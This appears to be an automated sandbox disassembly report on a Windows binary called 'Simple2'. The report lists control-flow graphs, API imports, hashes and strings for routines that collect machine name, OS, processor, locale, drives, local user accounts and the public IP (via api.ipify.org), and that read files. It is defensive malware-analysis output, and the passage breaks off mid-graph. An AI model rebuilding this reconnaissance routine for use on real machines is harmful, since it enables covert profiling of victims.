            • API ID: U?$char_traits@$D@std@@@std@@$memset$Value$CloseOpenU?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@Osfx@?$basic_ostream@_V12@V?$basic_streambuf@
            • String ID: BaseBoardProduct$DisplayVersion$HARDWARE\DESCRIPTION\System\BIOS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Machine name: $OS display version: $OS name: $Processor name: $ProcessorNameString$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
            • API String ID: 20268565-1502927450
            • Opcode ID: e8a849ff1cf450a5639899f728c5979a0428117e68cf5c9bfb62e6c39eaeade9
            • Instruction ID: 024afe4e56fd7f0f7a8878fcf77d470a24c11b74bb595d0efbc1af21a6c81e93
            • Opcode Fuzzy Hash: e8a849ff1cf450a5639899f728c5979a0428117e68cf5c9bfb62e6c39eaeade9
            • Instruction Fuzzy Hash: C2914E3165CB41D5EF24DF25E8402AA6364FF86788F804139FA8D87A69EF3CE189D740

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: Http$CloseHandle$DataOpenRequestmemcpy$AvailableConnectQueryReadReceiveResponseSend_invalid_parameter_noinfo_noreturnmemset
            • String ID: GET$Unable to get IP$WinHTTP/1.0$api.ipify.org
            • API String ID: 849217320-4095685055
            • Opcode ID: 5220dba4e9b23e91aa39575f81e94c7ae60bf55f278317e19a8425e346ebed56
            • Instruction ID: 0a26c8ac1264cfef0f13a0f39de93050adcabd939c3dc9e65fdbacdb5f27da93
            • Opcode Fuzzy Hash: 5220dba4e9b23e91aa39575f81e94c7ae60bf55f278317e19a8425e346ebed56
            • Instruction Fuzzy Hash: C3617B62A5C782C2EE14CB25E45026A67A1FF86B84F544139EA8D87B69DF3CF4C5DB00

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1051 7ff6876b3e70-7ff6876b3ecd GetLocaleInfoA 1052 7ff6876b3ecf-7ff6876b3eed call 7ff6876b9bb0 1051->1052 1053 7ff6876b3ef2-7ff6876b3f0f 1051->1053 1058 7ff6876b3fa9-7ff6876b3fd3 call 7ff6876bb160 1052->1058 1054 7ff6876b3f10-7ff6876b3f17 1053->1054 1054->1054 1057 7ff6876b3f19-7ff6876b3f47 call 7ff6876b9bb0 GetLocaleInfoA 1054->1057 1062 7ff6876b3fd4-7ff6876b3fe3 1057->1062 1063 7ff6876b3f4d-7ff6876b3f75 call 7ff6876b9bb0 1057->1063 1065 7ff6876b3fe7-7ff6876b3fee 1062->1065 1063->1058 1070 7ff6876b3f77-7ff6876b3f89 1063->1070 1065->1065 1067 7ff6876b3ff0-7ff6876b4156 call 7ff6876b9bb0 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ call 7ff6876b94e0 call 7ff6876baed0 call 7ff6876b94e0 call 7ff6876baed0 call 7ff6876b94e0 call 7ff6876b8760 call 7ff6876b7790 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 1065->1067 1090 7ff6876b4158-7ff6876b416a 1067->1090 1091 7ff6876b418d-7ff6876b41a9 1067->1091 1072 7ff6876b3fa4 call 7ff6876bb180 1070->1072 1073 7ff6876b3f8b-7ff6876b3f9e 1070->1073 1072->1058 1073->1072 1075 7ff6876b41e0-7ff6876b41e6 _invalid_parameter_noinfo_noreturn 1073->1075 1092 7ff6876b4188 call 7ff6876bb180 1090->1092 1093 7ff6876b416c-7ff6876b417f 1090->1093 1091->1058 1094 7ff6876b41af-7ff6876b41c1 1091->1094 1092->1091 1093->1092 1095 7ff6876b4181-7ff6876b4187 _invalid_parameter_noinfo_noreturn 1093->1095 1094->1072 1097 7ff6876b41c7-7ff6876b41da 1094->1097 1095->1092 1097->1072 1097->1075
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$InfoLocale_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@memcpymemset
            • String ID: Country: $Failed to get locale$Language:
            • API String ID: 3095796567-568146128
            • Opcode ID: b590ea95d77fd6855fedfa3c9a8500dbf4fe7e56d19c5eed8c4f2d26f6babfe5
            • Instruction ID: 157c458a7ff7aff5bd275a3860146c329020cca24ef46a7f766abadd84e09b2f
            • Opcode Fuzzy Hash: b590ea95d77fd6855fedfa3c9a8500dbf4fe7e56d19c5eed8c4f2d26f6babfe5
            • Instruction Fuzzy Hash: B7A1A472A58B86C2EF00CB25E4402AD7765FF86794F504236F69D87AA9DF7CE085D700

            Control-flow Graph

            APIs
            • GetLogicalDrives.KERNELBASE ref: 00007FF6876B37DF
            • memset.VCRUNTIME140 ref: 00007FF6876B37F3
              • Part of subcall function 00007FF6876B6390: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B63CA
              • Part of subcall function 00007FF6876B6390: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6876B63E6
              • Part of subcall function 00007FF6876B6390: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B6418
              • Part of subcall function 00007FF6876B94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9559
              • Part of subcall function 00007FF6876B94E0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9579
              • Part of subcall function 00007FF6876B94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9589
              • Part of subcall function 00007FF6876B94E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9664
              • Part of subcall function 00007FF6876B94E0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B966B
              • Part of subcall function 00007FF6876B94E0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9678
            • GetDiskFreeSpaceExA.KERNELBASE ref: 00007FF6876B3912
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF6876B3947
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B39E9
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B39F3
              • Part of subcall function 00007FF6876B9260: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6876B1C3D), ref: 00007FF6876B92A6
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3A28
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3A2F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@D@std@@@1@@DiskDrivesFreeLogicalOsfx@?$basic_ostream@_SpaceV01@_V12@V?$basic_streambuf@memcpymemset
            • String ID: GB$Available Drives:
            • API String ID: 2435906160-4081138596
            • Opcode ID: 4cb53dfc68d3d9a01b4374012e4dcb0437233c29287e7b805d3bda07c0b85666
            • Instruction ID: 0ba8fa471183dfc9185c7db9ef2c702bfa35f999e9aff86b06504cb542859ba8
            • Opcode Fuzzy Hash: 4cb53dfc68d3d9a01b4374012e4dcb0437233c29287e7b805d3bda07c0b85666
            • Instruction Fuzzy Hash: 0D61C622A58B82C5EF10DB25E4403AD6360FF96798F005239FA8D47AA5DF7CE0C5D740

            Control-flow Graph

            APIs
            • memset.VCRUNTIME140 ref: 00007FF6876B3A8E
              • Part of subcall function 00007FF6876B6390: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B63CA
              • Part of subcall function 00007FF6876B6390: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6876B63E6
              • Part of subcall function 00007FF6876B6390: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B6418
            • NetUserEnum.NETAPI32 ref: 00007FF6876B3ACB
            • NetApiBufferFree.NETAPI32 ref: 00007FF6876B3BAC
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B3BF4
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B3BFE
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3C2B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BufferD@std@@@1@@EnumFreeUserV?$basic_streambuf@_invalid_parameter_noinfo_noreturnmemset
            • String ID: User:
            • API String ID: 429987867-381282118
            • Opcode ID: 3a2b85ab6f3da6fbc4bee8247e454fd27ad0649b8ebffdf9eaac72bb972dfe03
            • Instruction ID: 63537264a82ec64368c220d34306300b36acf61eb301bf3b2ae5afe66ed5d9ae
            • Opcode Fuzzy Hash: 3a2b85ab6f3da6fbc4bee8247e454fd27ad0649b8ebffdf9eaac72bb972dfe03
            • Instruction Fuzzy Hash: 0D516E32B48B42C5EF10DF25E4802AD7761FF86794F40413AEA4D87AA9DF38E485DB40

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1005 7ff6876b1790-7ff6876b17e5 memset 1006 7ff6876b17e7 1005->1006 1007 7ff6876b17ea-7ff6876b1824 call 7ff6876b8560 1005->1007 1006->1007 1010 7ff6876b1826-7ff6876b1877 call 7ff6876b94e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 1007->1010 1011 7ff6876b187c-7ff6876b18b7 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z 1007->1011 1021 7ff6876b19f4-7ff6876b1a3d call 7ff6876b70b0 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6876bb160 1010->1021 1013 7ff6876b192e-7ff6876b1933 1011->1013 1014 7ff6876b18b9-7ff6876b18c6 1011->1014 1015 7ff6876b1938-7ff6876b195b ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z ??7ios_base@std@@QEBA_NXZ 1013->1015 1017 7ff6876b1a44-7ff6876b1aaa call 7ff6876bace0 call 7ff6876b70b0 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 1014->1017 1018 7ff6876b18cc-7ff6876b18d3 1014->1018 1019 7ff6876b19c8-7ff6876b19cf 1015->1019 1020 7ff6876b195d-7ff6876b198e call 7ff6876b94e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 1015->1020 1023 7ff6876b18fe-7ff6876b1906 call 7ff6876bb188 1018->1023 1024 7ff6876b18d5-7ff6876b18dc 1018->1024 1029 7ff6876b19d3-7ff6876b19f0 1019->1029 1020->1029 1041 7ff6876b1990-7ff6876b199d 1020->1041 1038 7ff6876b1909-7ff6876b192c memset 1023->1038 1027 7ff6876b1a3e-7ff6876b1a43 call 7ff6876b1270 1024->1027 1028 7ff6876b18e2 call 7ff6876bb188 1024->1028 1027->1017 1043 7ff6876b18e7-7ff6876b18ea 1028->1043 1029->1021 1038->1015 1045 7ff6876b199f-7ff6876b19b2 1041->1045 1046 7ff6876b19bb-7ff6876b19c6 call 7ff6876bb180 1041->1046 1047 7ff6876b18f0-7ff6876b18fc 1043->1047 1048 7ff6876b19b4-7ff6876b19ba _invalid_parameter_noinfo_noreturn 1043->1048 1045->1046 1045->1048 1046->1029 1047->1038 1048->1046
            APIs
            • memset.VCRUNTIME140 ref: 00007FF6876B17DB
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6876B1843
            • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140 ref: 00007FF6876B1886
            • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z.MSVCP140 ref: 00007FF6876B189D
            • memset.VCRUNTIME140 ref: 00007FF6876B191F
              • Part of subcall function 00007FF6876BB188: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6876B1079), ref: 00007FF6876BB1A2
            • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z.MSVCP140 ref: 00007FF6876B1943
            • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6876B1953
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6876B197A
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B19B4
            • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B1A01
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B1A0B
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B1A3E
            • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B1A9C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: D@std@@@std@@U?$char_traits@$V01@$??1?$basic_istream@??6?$basic_ostream@V01@@memset$??1?$basic_ios@??7ios_base@std@@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@Concurrency::cancel_current_taskMbstatet@@@2@V12@V12@_V?$fpos@_invalid_parameter_noinfo_noreturnmalloc
            • String ID: Couldn't open the file$Couldn't read the file
            • API String ID: 2898521299-2967168750
            • Opcode ID: 6b7ca949362c67caec4b84bc820215c3e0455586fb8f6a8d5dc2d58e2464d686
            • Instruction ID: b0dbf6881d277872587c30e539271fd3c167bb4266454059dc8db79f9ff033b9
            • Opcode Fuzzy Hash: 6b7ca949362c67caec4b84bc820215c3e0455586fb8f6a8d5dc2d58e2464d686
            • Instruction Fuzzy Hash: 4E919032A48B85D1EF14DB25E8802A97361FF86B94F54423AEE5D877A4DF3CE485D700

            Control-flow Graph

            APIs
            • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B157D
            • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6876B159C
            • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B15D0
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF6876B1607
            • isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6876B1639
            • ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF6876B165E
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF6876B168C
            • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B16E9
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B16F3
              • Part of subcall function 00007FF6876B9310: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6876B935D
              • Part of subcall function 00007FF6876B9310: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6876B937D
              • Part of subcall function 00007FF6876B9310: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6876B938D
              • Part of subcall function 00007FF6876B9310: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6876B93ED
              • Part of subcall function 00007FF6876B9310: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6876B9416
              • Part of subcall function 00007FF6876B9310: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6876B944D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$?sputc@?$basic_streambuf@$??6?$basic_ostream@?good@ios_base@std@@V01@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@?flush@?$basic_ostream@_?setw@std@@D@std@@@1@_J@1@_Smanip@_U?$_U?$char_traits@_V12@V21@@V?$basic_streambuf@Vios_base@1@W@std@@@std@@isalnum
            • String ID: _$~
            • API String ID: 2365617078-3740536066
            • Opcode ID: a14253ab657007596ee1eb18ea39cbf631e03ff104c02efb61f706c9878d418d
            • Instruction ID: 6953cc7d720261e88fde2292080294ba1baaeb86460ae6dbdf11cd70a5a674d3
            • Opcode Fuzzy Hash: a14253ab657007596ee1eb18ea39cbf631e03ff104c02efb61f706c9878d418d
            • Instruction Fuzzy Hash: 2A518232A48A41D6EF14CF15E890269B770FF8AB88F544039EB4E97664EF3DE485D700

            Control-flow Graph

            APIs
            • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6876B17F7), ref: 00007FF6876B85A0
            • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6876B85BF
            • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B85F1
            • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6876B860C
            • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF6876B8632
            • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6876B864F
            • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6876B8676
            • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z.MSVCP140 ref: 00007FF6876B869D
            • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF6876B86C1
              • Part of subcall function 00007FF6876B9AA0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF6876B9ACD
              • Part of subcall function 00007FF6876B9AA0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6876B9AE7
              • Part of subcall function 00007FF6876B9AA0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF6876B9B19
              • Part of subcall function 00007FF6876B9AA0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF6876B9B44
              • Part of subcall function 00007FF6876B9AA0: std::_Facet_Register.LIBCPMT ref: 00007FF6876B9B5D
              • Part of subcall function 00007FF6876B9AA0: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF6876B9B7C
            • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6876B86D6
            • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6876B86ED
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6876B872B
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@_Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@H001@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@_U_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@W@std@@@std@@_get_stream_buffer_pointersstd::_
            • String ID:
            • API String ID: 3818078705-0
            • Opcode ID: f80c16aa7f3e35dcf50a6edced1f1c553555d42dd7a706662d9725effb48244f
            • Instruction ID: e2873bf363024571cd8f29546738b66f523517e026b6f440d5d8385f87cf4bd3
            • Opcode Fuzzy Hash: f80c16aa7f3e35dcf50a6edced1f1c553555d42dd7a706662d9725effb48244f
            • Instruction Fuzzy Hash: 18510832A48B46C6EB15CF25E59026977A4FF8AB85F044039EA8D47B24DF3CE0A5D740

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1173 7ff6876b96f0-7ff6876b971f 1174 7ff6876b9720-7ff6876b9728 1173->1174 1174->1174 1175 7ff6876b972a-7ff6876b9739 1174->1175 1176 7ff6876b9745 1175->1176 1177 7ff6876b973b-7ff6876b973e 1175->1177 1179 7ff6876b9747-7ff6876b9757 1176->1179 1177->1176 1178 7ff6876b9740-7ff6876b9743 1177->1178 1178->1179 1180 7ff6876b9760-7ff6876b9772 ?good@ios_base@std@@QEBA_NXZ 1179->1180 1181 7ff6876b9759-7ff6876b975f 1179->1181 1182 7ff6876b97a4-7ff6876b97aa 1180->1182 1183 7ff6876b9774-7ff6876b9783 1180->1183 1181->1180 1187 7ff6876b97b6-7ff6876b97cf 1182->1187 1188 7ff6876b97ac-7ff6876b97b1 1182->1188 1185 7ff6876b9785-7ff6876b9788 1183->1185 1186 7ff6876b97a2 1183->1186 1185->1186 1189 7ff6876b978a-7ff6876b97a0 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1185->1189 1186->1182 1191 7ff6876b97d1-7ff6876b97d4 1187->1191 1192 7ff6876b97ff-7ff6876b981a ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1187->1192 1190 7ff6876b986e-7ff6876b988c ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1188->1190 1189->1182 1193 7ff6876b988e-7ff6876b9897 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1190->1193 1194 7ff6876b9898-7ff6876b98a8 1190->1194 1191->1192 1195 7ff6876b97d6-7ff6876b97f1 